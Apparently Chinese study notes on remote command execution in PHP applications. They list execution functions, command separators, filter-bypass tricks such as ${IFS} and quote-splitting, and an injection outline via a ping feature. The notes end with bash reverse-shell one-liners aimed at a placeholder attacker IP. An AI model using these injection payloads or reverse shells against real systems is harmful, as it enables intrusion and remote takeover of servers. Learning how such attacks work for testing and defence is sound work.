RCE(remote command execute)远程命令执行。应用程序的某些功能需要调用可以执行的系统命令的函数,如果这些函数或者函数的参数被用户控制,就可能通过命令连接符将恶意的命令拼接到函数中,从而执行系统命令。
常见的命令执行函数
system 执行系统命令 执行命令并显示输出 相当于在windows下控制cmd 在Linux下/bin/bash和/bin/sh这时linux系统下两个不同的终端
exec 执行系统命令 执行命令但不输出
shell_exec 执行系统命令,但不进行输出,输出结果以完整的字符串返回
passthru 执行系统命令,原样输出结果,没有返回值
eval()、assert()将括号内的内容按照php代码执行
常见的Windows系统下的命令连接符
& 符号前面的语句为假,则执行符号后的语句;若符号前面的语句为真,则符号前后语句都执行
&& 符号前面的语句为假,则直接报错不执行符号后的语句;若符号前面的语句为真,则符号前后的语句都执行
| 符号前的语句为假,则语句报错后面的语句不执行;若符号前面的语句为真,则执行符号后语句
|| 符号前面语句为假,则执行符号后面的语句;若符号前面的语句为真,则执行符号前的语句
常见的Linux系统下的命令连接符
& 符号前面的语句为假,则执行符号后的语句;若符号前面的语句为真,则符号前后语句都执行
&& 符号前面的语句为假,则直接报错不执行符号后的语句;若符号前面的语句为真,则符号前后的语句都执行
| 不论符号前的语句真假,都会执行符号后面的语句,当符号前面的语句为真时,会执行前面的语句但不输出,会将结果传给符号后面的语句 如:netstat -pantu | grep 22 可以对端口进行筛选输出
|| 符号前面语句为假,则执行符号后面的语句;若符号前面的语句为真,则执行符号前的语句
;命令按顺序执行
命令执行绕过
1、空格被过滤
在老版本中可以使用${IFS}、${IFS}$9、$IFS$9代替空格、通过{cat,file}代替 cat file
在新版本中使用<>或<代替空格
2、关键字被过滤
在老版本中,通过赋值的方式绕过 a=c;b=a;c=t;$a$b$c file1(cat file1)
在新版本中,c'a't<>file1
远程命令执行漏洞实例
1、找到一个执行系统命令的点
2、这个点可以执行的系统命令只有ping,可以通过命令的连接符来插入恶意的系统命令。
常见的反弹shell
在Linux系统下 连接到攻击者的主机(前提攻击者需要提前在端口上进行监听)
bash -i >& /dev/tcp/攻击者ip/攻击者端口 0>&1
将终端通过tcp的方式交给攻击者ip的指定端口,攻击者主机此时可以拿到shell
/bin/bash -i >& /dev/tcp/攻击者ip/攻击者端口 0<& 2>&1
bash -c "/bin/bash -i >& /dev/tcp/攻击者ip/攻击者端口 0>&1
